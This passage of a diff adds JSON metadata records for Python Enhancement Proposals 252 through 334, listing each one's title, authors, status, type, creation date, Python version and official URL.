Classes", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0252/" + }, + "253": { + "number": 253, + "title": "Subtyping Built-in Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0253/" + }, + "254": { + "number": 254, + "title": "Making Classes Look More Like Types", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0254/" + }, + "255": { + "number": 255, + "title": "Simple Generators", + "authors": "Neil Schemenauer, Tim Peters, Magnus Lie Hetland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-May-2001", + "python_version": "2.2", + "post_history": "14-Jun-2001, 23-Jun-2001", + "resolution": null, + "requires": "234", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0255/" + }, + "256": { + "number": 256, + "title": "Docstring Processing System Framework", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jun-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0256/" + }, + "257": { + "number": 257, + "title": "Docstring Conventions", + "authors": "David Goodger, Guido van Rossum", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": "", + "created": "29-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0257/" + }, + "258": { + "number": 258, + "title": "Docutils Design Specification", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-May-2001", + "python_version": null, + "post_history": "13-Jun-2001", + "resolution": null, + "requires": "256, 257", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0258/" + }, + "259": { + "number": 259, + "title": "Omit printing newline after newline", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Jun-2001", + "python_version": "2.2", + "post_history": "11-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0259/" + }, + "260": { + "number": 260, + "title": "Simplify xrange()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jun-2001", + "python_version": "2.2", + "post_history": "26-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0260/" + }, + "261": { + "number": 261, + "title": "Support for \"wide\" Unicode characters", + "authors": "Paul Prescod", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2001", + "python_version": "2.2", + "post_history": "27-Jun-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0261/" + }, + "262": { + "number": 262, + "title": "A Database of Installed Python Packages", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2001", + "python_version": null, + "post_history": "27-Mar-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0262/" + }, + "263": { + "number": 263, + "title": "Defining Python Source Code Encodings", + "authors": "Marc-Andr\u00e9 Lemburg, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0263/" + }, + "264": { + "number": 264, + "title": "Future statements in simulated shells", + "authors": "Michael Hudson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2001", + "python_version": "2.2", + "post_history": "30-Jul-2001", + "resolution": null, + "requires": "236", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0264/" + }, + "265": { + "number": 265, + "title": "Sorting Dictionaries by Value", + "authors": "Grant Griffin", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0265/" + }, + "266": { + "number": 266, + "title": "Optimizing Global Variable/Attribute Access", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Aug-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0266/" + }, + "267": { + "number": 267, + "title": "Optimized Access to Module Namespaces", + "authors": "Jeremy Hylton", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "23-May-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0267/" + }, + "268": { + "number": 268, + "title": "Extended HTTP functionality and WebDAV", + "authors": "Greg Stein", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Aug-2001", + "python_version": "2.x", + "post_history": "21-Aug-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0268/" + }, + "269": { + "number": 269, + "title": "Pgen Module for Python", + "authors": "Jonathan Riehl", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0269/" + }, + "270": { + "number": 270, + "title": "uniq method for list objects", + "authors": "Jason Petrone", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0270/" + }, + "271": { + "number": 271, + "title": "Prefixing sys.path by command line option", + "authors": "Fr\u00e9d\u00e9ric B. Giacometti", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Aug-2001", + "python_version": "2.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0271/" + }, + "272": { + "number": 272, + "title": "API for Block Encryption Algorithms v1.0", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "18-Sep-2001", + "python_version": null, + "post_history": "17-Apr-2002, 29-May-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0272/" + }, + "273": { + "number": 273, + "title": "Import Modules from Zip Archives", + "authors": "James C. Ahlstrom", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Oct-2001", + "python_version": "2.3", + "post_history": "26-Oct-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0273/" + }, + "274": { + "number": 274, + "title": "Dict Comprehensions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2001", + "python_version": "2.7, 3.0", + "post_history": "29-Oct-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0274/" + }, + "275": { + "number": 275, + "title": "Switching on Multiple Values", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Nov-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0275/" + }, + "276": { + "number": 276, + "title": "Simple Iterator for ints", + "authors": "Jim Althoff", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0276/" + }, + "277": { + "number": 277, + "title": "Unicode file name support for Windows NT", + "authors": "Neil Hodgson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0277/" + }, + "278": { + "number": 278, + "title": "Universal Newline Support", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0278/" + }, + "279": { + "number": 279, + "title": "The enumerate() built-in function", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0279/" + }, + "280": { + "number": 280, + "title": "Optimizing access to globals", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0280/" + }, + "281": { + "number": 281, + "title": "Loop Counter Iteration with range and xrange", + "authors": "Magnus Lie Hetland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0281/" + }, + "282": { + "number": 282, + "title": "A Logging System", + "authors": "Vinay Sajip, Trent Mick", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0282/" + }, + "283": { + "number": 283, + "title": "Python 2.3 Release Schedule", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Feb-2002", + "python_version": "2.3", + "post_history": "27-Feb-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0283/" + }, + "284": { + "number": 284, + "title": "Integer for-loops", + "authors": "David Eppstein, Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0284/" + }, + "285": { + "number": 285, + "title": "Adding a bool type", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2002", + "python_version": "2.3", + "post_history": "08-Mar-2002, 30-Mar-2002, 03-Apr-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0285/" + }, + "286": { + "number": 286, + "title": "Enhanced Argument Tuples", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "03-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0286/" + }, + "287": { + "number": 287, + "title": "reStructuredText Docstring Format", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": "", + "created": "25-Mar-2002", + "python_version": null, + "post_history": "02-Apr-2002", + "resolution": null, + "requires": null, + "replaces": "216", + "superseded_by": null, + "url": "https://peps.python.org/pep-0287/" + }, + "288": { + "number": 288, + "title": "Generators Attributes and Exceptions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0288/" + }, + "289": { + "number": 289, + "title": "Generator Expressions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.4", + "post_history": "22-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0289/" + }, + "290": { + "number": 290, + "title": "Code Migration and Modernization", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0290/" + }, + "291": { + "number": 291, + "title": "Backward Compatibility for the Python 2 Standard Library", + "authors": "Neal Norwitz", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0291/" + }, + "292": { + "number": 292, + "title": "Simpler String Substitutions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.4", + "post_history": "18-Jun-2002, 23-Mar-2004, 22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": "215", + "superseded_by": null, + "url": "https://peps.python.org/pep-0292/" + }, + "293": { + "number": 293, + "title": "Codec Error Handling Callbacks", + "authors": "Walter D\u00f6rwald", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.3", + "post_history": "19-Jun-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0293/" + }, + "294": { + "number": 294, + "title": "Type Names in the types Module", + "authors": "Oren Tirosh", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0294/" + }, + "295": { + "number": 295, + "title": "Interpretation of multiline string constants", + "authors": "Stepan Koltsov", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Jul-2002", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0295/" + }, + "296": { + "number": 296, + "title": "Adding a bytes Object Type", + "authors": "Scott Gilbert", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "12-Jul-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0296/" + }, + "297": { + "number": 297, + "title": "Support for System Upgrades", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0297/" + }, + "298": { + "number": 298, + "title": "The Locked Buffer Interface", + "authors": "Thomas Heller", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Jul-2002", + "python_version": "2.3", + "post_history": "30-Jul-2002, 01-Aug-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0298/" + }, + "299": { + "number": 299, + "title": "Special __main__() function in modules", + "authors": "Jeff Epler", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Aug-2002", + "python_version": "2.3", + "post_history": "29-Mar-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0299/" + }, + "301": { + "number": 301, + "title": "Package Index and Metadata for Distutils", + "authors": "Richard Jones", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2002", + "python_version": "2.3", + "post_history": "08-Nov-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0301/" + }, + "302": { + "number": 302, + "title": "New Import Hooks", + "authors": "Just van Rossum, Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2002", + "python_version": "2.3", + "post_history": "19-Dec-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0302/" + }, + "303": { + "number": 303, + "title": "Extend divmod() for Multiple Divisors", + "authors": "Thomas Bellman", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-Dec-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0303/" + }, + "304": { + "number": 304, + "title": "Controlling Generation of Bytecode Files", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "22-Jan-2003", + "python_version": null, + "post_history": "27-Jan-2003, 31-Jan-2003, 17-Jun-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0304/" + }, + "305": { + "number": 305, + "title": "CSV File API", + "authors": "Kevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells", + "discussions_to": "csv@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2003", + "python_version": "2.3", + "post_history": "31-Jan-2003, 13-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0305/" + }, + "306": { + "number": 306, + "title": "How to Change Python's Grammar", + "authors": "Michael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "29-Jan-2003", + "python_version": null, + "post_history": "30-Jan-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0306/" + }, + "307": { + "number": 307, + "title": "Extensions to the pickle protocol", + "authors": "Guido van Rossum, Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jan-2003", + "python_version": "2.3", + "post_history": "07-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0307/" + }, + "308": { + "number": 308, + "title": "Conditional Expressions", + "authors": "Guido van Rossum, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Feb-2003", + "python_version": "2.5", + "post_history": "07-Feb-2003, 11-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0308/" + }, + "309": { + "number": 309, + "title": "Partial Function Application", + "authors": "Peter Harris", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2003", + "python_version": "2.5", + "post_history": "10-Feb-2003, 27-Feb-2003, 22-Feb-2004, 28-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0309/" + }, + "310": { + "number": 310, + "title": "Reliable Acquisition/Release Pairs", + "authors": "Michael Hudson, Paul Moore", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2002", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0310/" + }, + "311": { + "number": 311, + "title": "Simplified Global Interpreter Lock Acquisition for Extensions", + "authors": "Mark Hammond", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Feb-2003", + "python_version": "2.3", + "post_history": "05-Feb-2003, 14-Feb-2003, 19-Apr-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0311/" + }, + "312": { + "number": 312, + "title": "Simple Implicit Lambda", + "authors": "Roman Suzi, Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0312/" + }, + "313": { + "number": 313, + "title": "Adding Roman Numeral Literals to Python", + "authors": "Mike Meyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0313/" + }, + "314": { + "number": 314, + "title": "Metadata for Python Software Packages 1.1", + "authors": "A.M. Kuchling, Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Apr-2003", + "python_version": "2.5", + "post_history": "29-Apr-2003", + "resolution": null, + "requires": null, + "replaces": "241", + "superseded_by": "345", + "url": "https://peps.python.org/pep-0314/" + }, + "315": { + "number": 315, + "title": "Enhanced While Loop", + "authors": "Raymond Hettinger, W Isaac Carroll", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Apr-2003", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0315/" + }, + "316": { + "number": 316, + "title": "Programming by Contract for Python", + "authors": "Terence Way", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-May-2003", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0316/" + }, + "317": { + "number": 317, + "title": "Eliminate Implicit Exception Instantiation", + "authors": "Steven Taschuk", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "06-May-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0317/" + }, + "318": { + "number": 318, + "title": "Decorators for Functions and Methods", + "authors": "Kevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003, 10-Jun-2003, 27-Feb-2004, 23-Mar-2004, 30-Aug-2004, 02-Sep-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0318/" + }, + "319": { + "number": 319, + "title": "Python Synchronize/Asynchronize Block", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0319/" + }, + "320": { + "number": 320, + "title": "Python 2.4 Release Schedule", + "authors": "Barry Warsaw, Raymond Hettinger, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jul-2003", + "python_version": "2.4", + "post_history": "01-Dec-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0320/" + }, + "321": { + "number": 321, + "title": "Date/Time Parsing and Formatting", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "16-Sep-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0321/" + }, + "322": { + "number": 322, + "title": "Reverse Iteration", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2003", + "python_version": "2.4", + "post_history": "24-Sep-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0322/" + }, + "323": { + "number": 323, + "title": "Copyable Iterators", + "authors": "Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2003", + "python_version": "2.5", + "post_history": "29-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0323/" + }, + "324": { + "number": 324, + "title": "subprocess - New process module", + "authors": "Peter Astrand", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0324/" + }, + "325": { + "number": 325, + "title": "Resource-Release Support for Generators", + "authors": "Samuele Pedroni", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0325/" + }, + "326": { + "number": 326, + "title": "A Case for Top and Bottom Values", + "authors": "Josiah Carlson, Terry Reedy", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2003", + "python_version": "2.4", + "post_history": "20-Dec-2003, 03-Jan-2004, 05-Jan-2004, 07-Jan-2004, 21-Feb-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0326/" + }, + "327": { + "number": 327, + "title": "Decimal Data Type", + "authors": "Facundo Batista", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2003", + "python_version": "2.4", + "post_history": "30-Nov-2003, 02-Jan-2004, 29-Jan-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0327/" + }, + "328": { + "number": 328, + "title": "Imports: Multi-Line and Absolute/Relative", + "authors": "Aahz", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Dec-2003", + "python_version": "2.4, 2.5, 2.6", + "post_history": "08-Mar-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0328/" + }, + "329": { + "number": 329, + "title": "Treating Builtins as Constants in the Standard Library", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2004", + "python_version": "2.4", + "post_history": "18-Apr-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0329/" + }, + "330": { + "number": 330, + "title": "Python Bytecode Verification", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "17-Jun-2004", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0330/" + }, + "331": { + "number": 331, + "title": "Locale-Independent Float/String Conversions", + "authors": "Christian R. Reis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2003", + "python_version": "2.4", + "post_history": "21-Jul-2003, 13-Aug-2003, 18-Jun-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0331/" + }, + "332": { + "number": 332, + "title": "Byte vectors and String/Unicode Unification", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2004", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0332/" + }, + "333": { + "number": 333, + "title": "Python Web Server Gateway Interface v1.0", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "07-Dec-2003", + "python_version": null, + "post_history": "07-Dec-2003, 08-Aug-2004, 20-Aug-2004, 27-Aug-2004, 27-Sep-2010", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3333", + "url": "https://peps.python.org/pep-0333/" + }, + "334": { + "number": 334, + "title": "Simple Coroutines via SuspendIteration", + "authors": "Clark C. Evans", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2004", + "python_version": "3.0", + "post_history": null, + "resolution": null, + 